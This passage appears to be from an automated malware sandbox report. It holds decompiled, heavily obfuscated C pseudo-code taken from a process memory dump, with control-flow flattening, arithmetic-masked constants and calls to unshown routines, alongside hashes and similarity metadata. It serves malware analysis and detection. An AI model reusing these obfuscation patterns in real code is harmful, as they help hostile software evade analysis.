                                              				_v48 = _v48 ^ 0xcd668ab2;
                                              				_t315 = 0x3a31b660;
                                              				_v48 = _v48 | 0x2f181106;
                                              				_v48 = _v48 ^ 0xef7e1823;
                                              				_v84 = 0x5d44;
                                              				_t353 = 0x2d;
                                              				_v84 = _v84 / _t353;
                                              				_v84 = _v84 ^ 0x00001499;
                                              				_v28 = 0xf70b;
                                              				_t354 = 0xd;
                                              				_v28 = _v28 / _t354;
                                              				_v28 = _v28 | 0x6a0646bd;
                                              				_v28 = _v28 >> 1;
                                              				_v28 = _v28 ^ 0x35037bad;
                                              				_v24 = 0xed7c;
                                              				_v24 = _v24 + 0xffff8d1e;
                                              				_v24 = _v24 + 0xffff0c72;
                                              				_t355 = 0x48;
                                              				_v24 = _v24 / _t355;
                                              				_v24 = _v24 ^ 0x038e22ac;
                                              				_v64 = 0x5fc5;
                                              				_v64 = _v64 >> 4;
                                              				_v64 = _v64 << 1;
                                              				_v64 = _v64 ^ 0x000058c3;
                                              				_v92 = 0x2688;
                                              				_v92 = _v92 | 0xea27999c;
                                              				_v92 = _v92 ^ 0xea278961;
                                              				_v96 = 0x4a14;
                                              				_t356 = 0x1f;
                                              				_v96 = _v96 / _t356;
                                              				_v96 = _v96 ^ 0x0000119a;
                                              				_v36 = 0xd568;
                                              				_v36 = _v36 ^ 0xbcd770ac;
                                              				_v36 = _v36 << 6;
                                              				_v36 = _v36 << 8;
                                              				_v36 = _v36 ^ 0xe97134d4;
                                              				_v68 = 0xedd2;
                                              				_t357 = 0x63;
                                              				_v68 = _v68 * 0x5e;
                                              				_v68 = _v68 + 0xde9c;
                                              				_v68 = _v68 ^ 0x00587d35;
                                              				_v32 = 0x24d4;
                                              				_v32 = _v32 << 9;
                                              				_v32 = _v32 ^ 0x2e569407;
                                              				_v32 = _v32 << 0xf;
                                              				_v32 = _v32 ^ 0x9e03fcb0;
                                              				_v104 = 0x1c4d;
                                              				_v104 = _v104 + 0xfffffff9;
                                              				_v104 = _v104 ^ 0x00005633;
                                              				_v40 = 0xb450;
                                              				_v40 = _v40 + 0x94db;
                                              				_v40 = _v40 | 0x3dcacfe3;
                                              				_v40 = _v40 / _t357;
                                              				_v40 = _v40 ^ 0x009f9709;
                                              				_v100 = 0x6d07;
                                              				_t358 = 0x45;
                                              				_v100 = _v100 * 0x69;
                                              				_v100 = _v100 ^ 0x002cf62e;
                                              				_v72 = 0x5e87;
                                              				_v72 = _v72 / _t358;
                                              				_v72 = _v72 + 0xffff9f14;
                                              				_v72 = _v72 ^ 0xffffe852;
                                              				_v56 = 0x964f;
                                              				_v56 = _v56 << 0xd;
                                              				_v56 = _v56 + 0x58a7;
                                              				_v56 = _v56 ^ 0x12ca7579;
                                              				_v8 = 0x11e7;
                                              				_t359 = 0x26;
                                              				_v8 = _v8 * 0x7e;
                                              				_v8 = _v8 << 7;
                                              				_v8 = _v8 / _t359;
                                              				_v8 = _v8 ^ 0x001dbdc0;
                                              				_v52 = 0x5afe;
                                              				_t360 = 0x23;
                                              				_v52 = _v52 * 0x24;
                                              				_v52 = _v52 / _t360;
                                              				_v52 = _v52 ^ 0x00001a55;
                                              				_v88 = 0xb83d;
                                              				_v88 = _v88 >> 0xd;
                                              				_v88 = _v88 ^ 0x00006413;
                                              				_v20 = 0x5af3;
                                              				_t361 = 0x3a;
                                              				_v20 = _v20 * 0x6b;
                                              				_v20 = _v20 + 0x6d49;
                                              				_v20 = _v20 ^ 0x8eb5ed48;
                                              				_v20 = _v20 ^ 0x8e93dded;
                                              				_v16 = 0x70c;
                                              				_v16 = _v16 / _t361;
                                              				_v16 = _v16 + 0xffff5089;
                                              				_v16 = _v16 | 0x770f0b4d;
                                              				_v16 = _v16 ^ 0xffff12de;
                                              				_v60 = 0xa79c;
                                              				_v60 = _v60 | 0xbac1c5ec;
                                              				_v60 = _v60 + 0x6b12;
                                              				_v60 = _v60 ^ 0xbac228f9;
                                              				_v12 = 0x5546;
                                              				_v12 = _v12 << 0xc;
                                              				_v12 = _v12 >> 0xd;
                                              				_v12 = _v12 * 0x74;
                                              				_v12 = _v12 ^ 0x001372eb;
                                              				_v80 = 0x25db;
                                              				_v80 = _v80 << 0xd;
                                              				_v80 = _v80 << 3;
                                              				_v80 = _v80 ^ 0x25db4552;
                                              				_v44 = 0xe1b0;
                                              				_v44 = _v44 + 0xffff2f0e;
                                              				_v44 = _v44 | 0x46f5308b;
                                              				_v44 = _v44 * 0x56;
                                              				_v44 = _v44 ^ 0xd65e5bab;
                                              				_v108 = 0x5856;
                                              				_v108 = _v108 ^ 0x78cd5bef;
                                              				_v108 = _v108 ^ 0x78cd26cd;
                                              				_v76 = 0xfba5;
                                              				_v76 = _v76 + 0xffff77ce;
                                              				_t362 = 0x11;
                                              				_v76 = _v76 / _t362;
                                              				_v76 = _v76 ^ 0x00005641;
                                              				_t314 = 2;
                                              				do {
                                              					while(_t315 != 0x1de3f48) {
                                              						if(_t315 == 0x1f19b69e) {
                                              							_t363 = E002278A5(_t315, _t315, 0x10, _t315, 4);
                                              							E00227787(_v96, 1, _v36,  &_v112, _v68, _v32, _t348);
                                              							_t350 = _t348 + _t314;
                                              							E00227787(_v104, _t363, _v40,  &_v112, _v100, _v72, _t350);
                                              							_t365 = _t365 + 0x40;
                                              							_t351 = _t350 + _t363 * 2;
                                              							_t315 = 0x344e60d4;
                                              							_t303 = 0x5c;
                                              							 *_t351 = _t303;
                                              							_t348 = _t351 + _t314;
                                              							continue;
                                              						} else {
                                              							if(_t315 == 0x344e60d4) {
                                              								_t364 = E002278A5(_t315, _t315, 0x10, _t315, 4);
                                              								E00227787(_v20, _t364, _v16,  &_v112, _v60, _v12, _t348);
                                              								_t365 = _t365 + 0x28;
                                              								_t352 = _t348 + _t364 * 2;
                                              								_t315 = 0x1de3f48;
                                              								_t311 = 0x2e;
                                              								 *_t352 = _t311;
                                              								_t348 = _t352 + _t314;
                                              								continue;
                                              							} else {
                                              								if(_t315 == 0x3a31b660) {
                                              									_t311 = E00238C8F(_t315);
                                              									_v112 = _t311;
                                              									_t315 = 0x1f19b69e;
                                              									continue;
                                              								}
                                              							}
                                              						}
                                              						goto L9;
                                              					}
                                              					E00227787(_v80, 3, _v44,  &_v112, _v108, _v76, _t348);
                                              					_t349 = _t348 + 6;
                                              					_t365 = _t365 + 0x18;
                                              					_t315 = 0x2228f3b5;
                                              					 *_t349 = 0;
                                              					_t348 = _t349 + _t314;
                                              					L9:
                                              				} while (_t315 != 0x2228f3b5);
                                              				return _t311;
                                              			}

                                              0x00231eca
                                              0x00231ed1
                                              0x00231ed8
                                              0x00231ee6
                                              0x00231eeb
                                              0x00231eee
                                              0x00231ef5
                                              0x00231ef6
                                              0x00231ef6
                                              0x00231f08
                                              0x00231f99
                                              0x00231fac
                                              0x00231fb1
                                              0x00231fc8
                                              0x00231fcd
                                              0x00231fd0
                                              0x00231fd3
                                              0x00231fda
                                              0x00231fdb
                                              0x00231fde
                                              0x00000000
                                              0x00231f0a
                                              0x00231f10
                                              0x00231f4e
                                              0x00231f61
                                              0x00231f66
                                              0x00231f69
                                              0x00231f6c
                                              0x00231f73
                                              0x00231f74
                                              0x00231f77
                                              0x00000000
                                              0x00231f12
                                              0x00231f18
                                              0x00231f24
                                              0x00231f29
                                              0x00231f2c
                                              0x00000000
                                              0x00231f2c
                                              0x00231f18
                                              0x00231f10
                                              0x00000000
                                              0x00231f08
                                              0x00231ffb
                                              0x00232000
                                              0x00232005
                                              0x00232008
                                              0x0023200d
                                              0x00232010
                                              0x00232012
                                              0x00232012
                                              0x00232024

                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.2109584189.0000000000221000.00000020.00000001.sdmp, Offset: 00220000, based on PE: true
                                              • Associated: 00000007.00000002.2109565490.0000000000220000.00000004.00000001.sdmp
                                              • Associated: 00000007.00000002.2109615859.000000000023C000.00000004.00000001.sdmp
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID: 5}X
                                              • API String ID: 0-583016468
                                              • Opcode ID: ec4c3dcec50a5910c37c25ce316154261ec553cc523febe50d32d280e7c8df78
                                              • Instruction ID: 0af3a5236d8b7cf2e6bb0496a8f94611baee9a08d5d11c1ef11e3cc3eed87243
                                              • Opcode Fuzzy Hash: ec4c3dcec50a5910c37c25ce316154261ec553cc523febe50d32d280e7c8df78
                                              • Instruction Fuzzy Hash: 51D12271D10319EBDB18CFE5D88A9DEBBB1FF44314F208019E112BA2A0D7B91A56CF90
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 89%
                                              			E002262A3() {
                                              				signed int _v8;
                                              				signed int _v12;
                                              				signed int _v16;
                                              				signed int _v20;
                                              				signed int _v24;
                                              				signed int _v28;
                                              				signed int _v32;
                                              				signed int _v36;
                                              				signed int _v40;
                                              				signed int _v44;
                                              				signed int _v48;
                                              				signed int _v52;
                                              				signed int _v56;
                                              				signed int _v60;
                                              				signed int _v64;
                                              				signed int _v68;
                                              				signed int _v72;
                                              				signed int _v76;
                                              				signed int _v80;
                                              				signed int _v84;
                                              				intOrPtr _v88;
                                              				char _v608;
                                              				char _v1128;
                                              				void* _t179;
                                              				void* _t180;
                                              				intOrPtr _t182;
                                              				void* _t190;
                                              				intOrPtr _t206;
                                              				void* _t209;
                                              				signed int _t210;
                                              				signed int _t211;
                                              				signed int _t212;
                                              				void* _t214;
                                              
                                              				_v88 = 0xf2dad;
                                              				_t209 = 0;
                                              				_t190 = 0x374ac1da;
                                              				_v84 = _v84 & 0;
                                              				_v40 = 0xb12b;
                                              				_v40 = _v40 << 0xe;
                                              				_v40 = _v40 >> 0xf;
                                              				_v40 = _v40 ^ 0x000058bc;
                                              				_v60 = 0xf727;
                                              				_t210 = 0x4f;
                                              				_v60 = _v60 / _t210;
                                              				_v60 = _v60 ^ 0x00007065;
                                              				_v8 = 0x9eec;
                                              				_v8 = _v8 + 0xd770;
                                              				_v8 = _v8 >> 0xe;
                                              				_v8 = _v8 >> 6;
                                              				_v8 = _v8 ^ 0x00000fb6;
                                              				_v44 = 0x7887;
                                              				_v44 = _v44 << 5;
                                              				_v44 = _v44 >> 0xc;
                                              				_v44 = _v44 ^ 0x00001109;
                                              				_v16 = 0xef0c;
                                              				_t211 = 0x7a;
                                              				_v16 = _v16 * 0x14;
                                              				_v16 = _v16 ^ 0xca26cbdc;
                                              				_v16 = _v16 | 0x7bdc5f23;
                                              				_v16 = _v16 ^ 0xfbfc55fd;
                                              				_v76 = 0xd8b4;
                                              				_v76 = _v76 + 0x9c32;
                                              				_v76 = _v76 ^ 0x00017966;
                                              				_v36 = 0x1b76;
                                              				_v36 = _v36 + 0x8638;
                                              				_v36 = _v36 | 0x465c0394;
                                              				_v36 = _v36 ^ 0x465cdef1;
                                              				_v28 = 0xf8c7;
                                              				_v28 = _v28 ^ 0x90f840f6;
                                              				_v28 = _v28 / _t211;
                                              				_v28 = _v28 ^ 0x01300a73;
                                              				_v80 = 0x4878;
                                              				_v80 = _v80 ^ 0xf33f81bb;
                                              				_v80 = _v80 ^ 0xf33fed7c;
                                              				_v12 = 0x5e32;
                                              				_v12 = _v12 >> 5;
                                              				_v12 = _v12 | 0xb939d170;
                                              				_v12 = _v12 + 0xffffe46d;
                                              				_v12 = _v12 ^ 0xb939c5f3;
                                              				_v72 = 0xdcc7;
                                              				_t212 = 5;
                                              				_v72 = _v72 / _t212;
                                              				_v72 = _v72 ^ 0x00000998;
                                              				_v52 = 0xf409;
                                              				_v52 = _v52 >> 7;
                                              				_v52 = _v52 >> 2;
                                              				_v52 = _v52 ^ 0x00002b61;
                                              				_v20 = 0x5cd8;
                                              				_v20 = _v20 + 0x5908;
                                              				_v20 = _v20 * 0x1c;
                                              				_v20 = _v20 * 0x14;
                                              				_v20 = _v20 ^ 0x018d9ab8;
                                              				_v32 = 0x162d;
                                              				_v32 = _v32 + 0xffff1b5c;
                                              				_v32 = _v32 >> 3;
                                              				_v32 = _v32 ^ 0x1fff9926;
                                              				_v64 = 0x95af;
                                              				_v64 = _v64 + 0xffff7063;
                                              				_v64 = _v64 ^ 0x00004670;
                                              				_v56 = 0xeead;
                                              				_v56 = _v56 + 0xffffd284;
                                              				_v56 = _v56 ^ 0x94a6c65a;
                                              				_v56 = _v56 ^ 0x94a662be;
                                              				_v68 = 0xa18;
                                              				_v68 = _v68 >> 0xa;
                                              				_v68 = _v68 ^ 0x0000400d;
                                              				_v48 = 0xd4d3;
                                              				_v48 = _v48 * 3;
                                              				_v48 = _v48 << 3;
                                              				_v48 = _v48 ^ 0x0013dfa3;
                                              				_v24 = 0x2d4a;
                                              				_v24 = _v24 << 9;
                                              				_v24 = _v24 + 0x17ff;
                                              				_v24 = _v24 ^ 0x005aa30d;
                                              				do {
                                              					while(_t190 != 0x17ec002) {
                                              						if(_t190 == 0x20702549) {
                                              							_push(_v36);
                                              							_t180 = E0023889D(0x23c930, _v76, __eflags);
                                              							_t182 =  *0x23ca2c; // 0x4d8300
                                              							_t206 =  *0x23ca2c; // 0x4d8300
                                              							E002229E3(_t206, 0x104, _t180, _v28, _v80, _v12, _t182 + 0x230,  &_v1128, _v72, _v52);
                                              							E00232025(_v20, _t180, _v32, _v64);
                                              							_t214 = _t214 + 0x30;
                                              							_t190 = 0x17ec002;
                                              							continue;
                                              						} else {
                                              							if(_t190 == 0x374ac1da) {
                                              								_push(_t190);
                                              								_push(_t190);
                                              								E0022C6C7(_v60, _v8,  &_v608, _t190, _v44, _v40, _v16);
                                              								_t214 = _t214 + 0x1c;
                                              								_t190 = 0x20702549;
                                              								continue;
                                              							}
                                              						}
                                              						goto L7;
                                              					}
                                              					_push(_t190);
                                              					_push(_v24);
                                              					_push(0);
                                              					_push(_v48);
                                              					_push(0);
                                              					_push(_v68);
                                              					_push( &_v1128);
                                              					_t179 = E0022568E(_v56, 0);
                                              					_t214 = _t214 + 0x1c;
                                              					__eflags = _t179;
                                              					_t209 =  !=  ? 1 : _t209;
                                              					_t190 = 0x3985ca2d;
                                              					L7:
                                              					__eflags = _t190 - 0x3985ca2d;
                                              				} while (__eflags != 0);
                                              				return _t209;
                                              			}

                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.2109584189.0000000000221000.00000020.00000001.sdmp, Offset: 00220000, based on PE: true
                                              • Associated: 00000007.00000002.2109565490.0000000000220000.00000004.00000001.sdmp
                                              • Associated: 00000007.00000002.2109615859.000000000023C000.00000004.00000001.sdmp
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID: I%p
                                              • API String ID: 0-3985577374
                                              • Opcode ID: b3f53a6467149419537f6f09bc4c34a53d2fb146d4657ed45ddf9a3933351b18
                                              • Instruction ID: 4343c094ae1d0674115463143560623cdfb1626950a94fba81751970624082ff
                                              • Opcode Fuzzy Hash: b3f53a6467149419537f6f09bc4c34a53d2fb146d4657ed45ddf9a3933351b18
                                              • Instruction Fuzzy Hash: 188127B2D1021DABDF18CFE5D94A9DEBBB1FF44318F208159E111B62A0D7B90A49CF94
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 92%
                                              			E00230D33(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                              				signed int _v8;
                                              				unsigned int _v12;
                                              				signed int _v16;
                                              				signed int _v20;
                                              				signed int _v24;
                                              				signed int _v28;
                                              				signed int _v32;
                                              				unsigned int _v36;
                                              				signed int _v40;
                                              				signed int _v44;
                                              				char _v48;
                                              				void* _t128;
                                              				signed int _t155;
                                              				signed int _t156;
                                              				signed int _t157;
                                              				signed int _t158;
                                              				void* _t173;
                                              				signed int _t174;
                                              
                                              				_push(_a12);
                                              				_t173 = __ecx;
                                              				_push(_a8);
                                              				_push(_a4);
                                              				_push(__ecx);
                                              				E0022602B(_t128);
                                              				_v8 = 0x6813;
                                              				_v8 = _v8 << 6;
                                              				_v8 = _v8 ^ 0xf4e07894;
                                              				_v8 = _v8 | 0x641e1778;
                                              				_v8 = _v8 ^ 0xf4fe1535;
                                              				_v16 = 0x7d9d;
                                              				_t155 = 0x16;
                                              				_v16 = _v16 * 0x4d;
                                              				_v16 = _v16 ^ 0x0025b62f;
                                              				_v32 = 0xbd8b;
                                              				_v32 = _v32 ^ 0xdfb27dce;
                                              				_v32 = _v32 / _t155;
                                              				_v32 = _v32 ^ 0x0a2b09ce;
                                              				_v28 = 0xad22;
                                              				_t156 = 0x34;
                                              				_v28 = _v28 * 0x47;
                                              				_v28 = _v28 + 0x4161;
                                              				_v28 = _v28 ^ 0x00307d44;
                                              				_v36 = 0xa165;
                                              				_v36 = _v36 >> 2;
                                              				_v36 = _v36 ^ 0x00006be3;
                                              				_v12 = 0xca43;
                                              				_v12 = _v12 << 7;
                                              				_v12 = _v12 + 0x4480;
                                              				_v12 = _v12 >> 0x10;
                                              				_v12 = _v12 ^ 0x00004998;
                                              				_v44 = 0xc326;
                                              				_v44 = _v44 / _t156;
                                              				_v44 = _v44 ^ 0x000051cc;
                                              				_v40 = 0xa768;
                                              				_v40 = _v40 / _t156;
                                              				_v40 = _v40 ^ 0x00002cdd;
                                              				_v24 = 0x8f0;
                                              				_v24 = _v24 << 2;
                                              				_v24 = _v24 + 0xffff08f5;
                                              				_v24 = _v24 | 0x28f06395;
                                              				_v24 = _v24 ^ 0xffff76ac;
                                              				_v20 = 0x26e;
                                              				_v20 = _v20 + 0xffffc9ca;
                                              				_v20 = _v20 + 0x3d88;
                                              				_v20 = _v20 * 0x16;
                                              				_v20 = _v20 ^ 0x00008c1f;
                                              				_v48 = E00238C8F(_t156);
                                              				_v8 = 0xba8c;
                                              				_v8 = _v8 + 0xffff546f;
                                              				_v8 = _v8 | 0xb28855c5;
                                              				_v8 = _v8 ^ 0xa47da239;
                                              				_v8 = _v8 ^ 0x16f5fdc2;
                                              				_v16 = 0x4025;
                                              				_t157 = 0xb;
                                              				_v16 = _v16 / _t157;
                                              				_v16 = _v16 + 0xffffba03;
                                              				_t158 = 0x3b;
                                              				_v16 = _v16 / _t158;
                                              				_v16 = _v16 ^ 0x0456c691;
                                              				_t174 = E002278A5(_t158, _t158, _v16, _t158, _v8);
                                              				E00227787(_v44, _t174, _v40,  &_v48, _v24, _v20, _t173);
                                              				 *((short*)(_t173 + _t174 * 2)) = 0;
                                              				return 0;
                                              			}

                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.2109584189.0000000000221000.00000020.00000001.sdmp, Offset: 00220000, based on PE: true
                                              • Associated: 00000007.00000002.2109565490.0000000000220000.00000004.00000001.sdmp
                                              • Associated: 00000007.00000002.2109615859.000000000023C000.00000004.00000001.sdmp
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID: D}0
                                              • API String ID: 0-882559769
                                              • Opcode ID: 0055a96e36ec0fc3778ffa7d8bdc67593becc071738deaf1b770c418e059c371
                                              • Instruction ID: 72bf9530bd4124a10b0561c3a69c9d8a419e38897cc61f17c38d09eef4c2f2ef
                                              • Opcode Fuzzy Hash: 0055a96e36ec0fc3778ffa7d8bdc67593becc071738deaf1b770c418e059c371
                                              • Instruction Fuzzy Hash: E25103B2D0130AEBDF08CFA5C94A8EEBBB2FB44304F108199E111B6250D7B95B55CF94
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 93%
                                              			E0023340A(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
                                              				char _v76;
                                              				intOrPtr _v80;
                                              				intOrPtr _v84;
                                              				intOrPtr _v88;
                                              				signed int _v92;
                                              				signed int _v96;
                                              				signed int _v100;
                                              				signed int _v104;
                                              				signed int _v108;
                                              				signed int _v112;
                                              				signed int _v116;
                                              				signed int _v120;
                                              				signed int _v124;
                                              				void* _t88;
                                              				void* _t94;
                                              				void* _t100;
                                              				void* _t102;
                                              				intOrPtr _t117;
                                              				signed int _t118;
                                              				signed int* _t121;
                                              
                                              				_t116 = _a8;
                                              				_t100 = __edx;
                                              				_push(_a8);
                                              				_push(_a4);
                                              				_push(__edx);
                                              				_push(__ecx);
                                              				E0022602B(_t88);
                                              				_v88 = 0x94797;
                                              				_t117 = 0;
                                              				_v84 = 0xfccb1;
                                              				_t121 =  &(( &_v124)[4]);
                                              				_v80 = 0;
                                              				_v120 = 0xe518;
                                              				_t102 = 0x2e39b5d1;
                                              				_v120 = _v120 >> 0xf;
                                              				_v120 = _v120 | 0x8d2dde7f;
                                              				_v120 = _v120 ^ 0x46a7e325;
                                              				_v120 = _v120 ^ 0xcb8a2201;
                                              				_v124 = 0x16d5;
                                              				_v124 = _v124 >> 0xe;
                                              				_v124 = _v124 | 0x69fc1cf8;
                                              				_t118 = 0x78;
                                              				_v124 = _v124 * 0x21;
                                              				_v124 = _v124 ^ 0xa97fd862;
                                              				_v104 = 0xc3ad;
                                              				_v104 = _v104 * 0x54;
                                              				_v104 = _v104 ^ 0x00400d02;
                                              				_v112 = 0x42c5;
                                              				_v112 = _v112 ^ 0xf5e3cf1a;
                                              				_v112 = _v112 ^ 0xb2e8281c;
                                              				_v112 = _v112 | 0x1ecbfa7f;
                                              				_v112 = _v112 ^ 0x5fcbcd35;
                                              				_v96 = 0xbfa3;
                                              				_v96 = _v96 ^ 0x0400a118;
                                              				_v96 = _v96 ^ 0x04005591;
                                              				_v116 = 0x719c;
                                              				_v116 = _v116 / _t118;
                                              				_v116 = _v116 << 3;
                                              				_v116 = _v116 + 0xbb41;
                                              				_v116 = _v116 ^ 0x0000fc42;
                                              				_v100 = 0x8c7a;
                                              				_v100 = _v100 << 3;
                                              				_v100 = _v100 ^ 0x0004412d;
                                              				_v92 = 0xd0f9;
                                              				_v92 = _v92 + 0xffffb579;
                                              				_v92 = _v92 ^ 0x0000a3c3;
                                              				_v108 = 0x6440;
                                              				_v108 = _v108 ^ 0x55818320;
                                              				_v108 = _v108 << 0xf;
                                              				_v108 = _v108 + 0x2c19;
                                              				_v108 = _v108 ^ 0xf3b003dd;
                                              				do {
                                              					while(_t102 != 0x4681a3b) {
                                              						if(_t102 == 0xbf6d415) {
                                              							__eflags = E0022B055(_v92, _v108, __eflags,  &_v76, _t116 + 4);
                                              							_t117 =  !=  ? 1 : _t117;
                                              						} else {
                                              							if(_t102 == 0x17b92136) {
                                              								E002350F2( &_v76, _v120, _v124, _v104, _t100);
                                              								_t121 =  &(_t121[3]);
                                              								_t102 = 0x4681a3b;
                                              								continue;
                                              							} else {
                                              								if(_t102 != 0x2e39b5d1) {
                                              									goto L10;
                                              								} else {
                                              									_t102 = 0x17b92136;
                                              									continue;
                                              								}
                                              							}
                                              						}
                                              						L13:
                                              						return _t117;
                                              					}
                                              					_t94 = E00238F11( &_v76, _v112, _v96, _t116, _v116, _v100);
                                              					_t121 =  &(_t121[4]);
                                              					__eflags = _t94;
                                              					if(__eflags == 0) {
                                              						_t102 = 0x114ebae0;
                                              						goto L10;
                                              					} else {
                                              						_t102 = 0xbf6d415;
                                              						continue;
                                              					}
                                              					goto L13;
                                              					L10:
                                              					__eflags = _t102 - 0x114ebae0;
                                              				} while (__eflags != 0);
                                              				goto L13;
                                              			}

                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.2109584189.0000000000221000.00000020.00000001.sdmp, Offset: 00220000, based on PE: true
                                              • Associated: 00000007.00000002.2109565490.0000000000220000.00000004.00000001.sdmp
                                              • Associated: 00000007.00000002.2109615859.000000000023C000.00000004.00000001.sdmp
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID: @d
                                              • API String ID: 0-4219467963
                                              • Opcode ID: 84c63284fc0912dd3544375fe592f81bfaac633f79c2e287a3bc015bf26ad4b2
                                              • Instruction ID: 8056466fca7a3fdc4bca1cf48a2a2b3c92d58ee8ae3d109bd9e88129b7b8fda7
                                              • Opcode Fuzzy Hash: 84c63284fc0912dd3544375fe592f81bfaac633f79c2e287a3bc015bf26ad4b2
                                              • Instruction Fuzzy Hash: 1B5156B11083469BD318CF21C98A82FFBE1BBD8748F504A1DF59692160D7B5CB598F87
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 92%
                                              			E00233FE7(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
                                              				char _v76;
                                              				signed int _v80;
                                              				signed int _v84;
                                              				signed int _v88;
                                              				signed int _v92;
                                              				signed int _v96;
                                              				signed int _v100;
                                              				signed int _v104;
                                              				signed int _v108;
                                              				signed int _v112;
                                              				void* _t80;
                                              				signed int _t94;
                                              				signed int _t95;
                                              				void* _t98;
                                              				void* _t114;
                                              				void* _t115;
                                              				void* _t117;
                                              				void* _t118;
                                              
                                              				_push(_a8);
                                              				_t114 = __ecx;
                                              				_push(_a4);
                                              				_push(__edx);
                                              				_push(__ecx);
                                              				E0022602B(_t80);
                                              				_v96 = 0xd1bf;
                                              				_t118 = _t117 + 0x10;
                                              				_t115 = 0;
                                              				_t98 = 0x349149b3;
                                              				_t94 = 0x64;
                                              				_v96 = _v96 / _t94;
                                              				_v96 = _v96 ^ 0x00007874;
                                              				_v104 = 0x2a01;
                                              				_v104 = _v104 + 0x4d1a;
                                              				_v104 = _v104 + 0xb0bd;
                                              				_v104 = _v104 ^ 0x00017b91;
                                              				_v108 = 0x44db;
                                              				_v108 = _v108 + 0xffff0b38;
                                              				_t95 = 0x1c;
                                              				_v108 = _v108 * 7;
                                              				_v108 = _v108 ^ 0xfffb0952;
                                              				_v112 = 0x5707;
                                              				_v112 = _v112 + 0x69dd;
                                              				_v112 = _v112 + 0xef17;
                                              				_v112 = _v112 | 0x7086095e;
                                              				_v112 = _v112 ^ 0x7087ed58;
                                              				_v92 = 0x8129;
                                              				_v92 = _v92 >> 3;
                                              				_v92 = _v92 ^ 0x00001eae;
                                              				_v80 = 0x8f03;
                                              				_v80 = _v80 ^ 0x5fd75a11;
                                              				_v80 = _v80 ^ 0x5fd7f025;
                                              				_v84 = 0x94fc;
                                              				_v84 = _v84 >> 0x10;
                                              				_v84 = _v84 ^ 0x00001c7c;
                                              				_v100 = 0xd584;
                                              				_v100 = _v100 >> 0xe;
                                              				_v100 = _v100 / _t95;
                                              				_v100 = _v100 ^ 0x00001ad3;
                                              				_v88 = 0x35b5;
                                              				_v88 = _v88 * 0x43;
                                              				_v88 = _v88 ^ 0x000e607f;
                                              				do {
                                              					while(_t98 != 0x2d9dd110) {
                                              						if(_t98 == 0x2e4dc862) {
                                              							__eflags = E00238F11( &_v76, _v80, _v84, _t114 + 8, _v100, _v88);
                                              							_t115 =  !=  ? 1 : _t115;
                                              						} else {
                                              							if(_t98 == 0x32f61d6a) {
                                              								E002350F2( &_v76, _v96, _v104, _v108, _a8);
                                              								_t118 = _t118 + 0xc;
                                              								_t98 = 0x2d9dd110;
                                              								continue;
                                              							} else {
                                              								if(_t98 != 0x349149b3) {
                                              									goto L10;
                                              								} else {
                                              									_t98 = 0x32f61d6a;
                                              									continue;
                                              								}
                                              							}
                                              						}
                                              						L13:
                                              						return _t115;
                                              					}
                                              					__eflags = E0022B055(_v112, _v92, __eflags,  &_v76, _t114);
                                              					if(__eflags == 0) {
                                              						_t98 = 0x5080212;
                                              						goto L10;
                                              					} else {
                                              						_t98 = 0x2e4dc862;
                                              						continue;
                                              					}
                                              					goto L13;
                                              					L10:
                                              					__eflags = _t98 - 0x5080212;
                                              				} while (__eflags != 0);
                                              				goto L13;
                                              			}

                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.2109584189.0000000000221000.00000020.00000001.sdmp, Offset: 00220000, based on PE: true
                                              • Associated: 00000007.00000002.2109565490.0000000000220000.00000004.00000001.sdmp
                                              • Associated: 00000007.00000002.2109615859.000000000023C000.00000004.00000001.sdmp
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID: tx
                                              • API String ID: 0-1414813443
                                              • Opcode ID: 7a271fa6b78f15920441f448b7bb9f475cb0270aa55ebeddac197ee12bed0436
                                              • Instruction ID: c8e648b5e7d9622aa969af5f7f2af3708eaea68391a96a9a337519b3fc7c7f0e
                                              • Opcode Fuzzy Hash: 7a271fa6b78f15920441f448b7bb9f475cb0270aa55ebeddac197ee12bed0436
                                              • Instruction Fuzzy Hash: DA41ABB15183429BE718DE20C88582FBBE1FBD8708F104A1DF5C996260D7B5DA19CF43
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 84%
                                              			E002260B9(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
                                              				unsigned int _v8;
                                              				signed int _v12;
                                              				signed int _v16;
                                              				signed int _v20;
                                              				signed int _v24;
                                              				signed int _v28;
                                              				signed int _v32;
                                              				signed int _v36;
                                              				signed int _v40;
                                              				char _v44;
                                              				void* _t104;
                                              				void* _t109;
                                              				signed int _t124;
                                              				signed int _t125;
                                              				signed int _t126;
                                              				void* _t128;
                                              
                                              				_push(_a20);
                                              				_t109 = __ecx;
                                              				_t111 = _a16;
                                              				_push(_a16);
                                              				_push(_a12);
                                              				_v44 = 0x104;
                                              				_push(0x104);
                                              				_push(_a4);
                                              				_push(__edx);
                                              				_push(__ecx);
                                              				E0022602B(0x104);
                                              				_v8 = 0xaf29;
                                              				_v8 = _v8 >> 0xe;
                                              				_t128 = 0;
                                              				_v8 = _v8 >> 4;
                                              				_v8 = _v8 >> 0xc;
                                              				_v8 = _v8 ^ 0x0000662d;
                                              				_v20 = 0xac55;
                                              				_v20 = _v20 | 0x2323cee5;
                                              				_t124 = 0x4c;
                                              				_v20 = _v20 / _t124;
                                              				_v20 = _v20 ^ 0x007629b6;
                                              				_v16 = 0xabf2;
                                              				_v16 = _v16 | 0x220f7c85;
                                              				_v16 = _v16 + 0xffff7509;
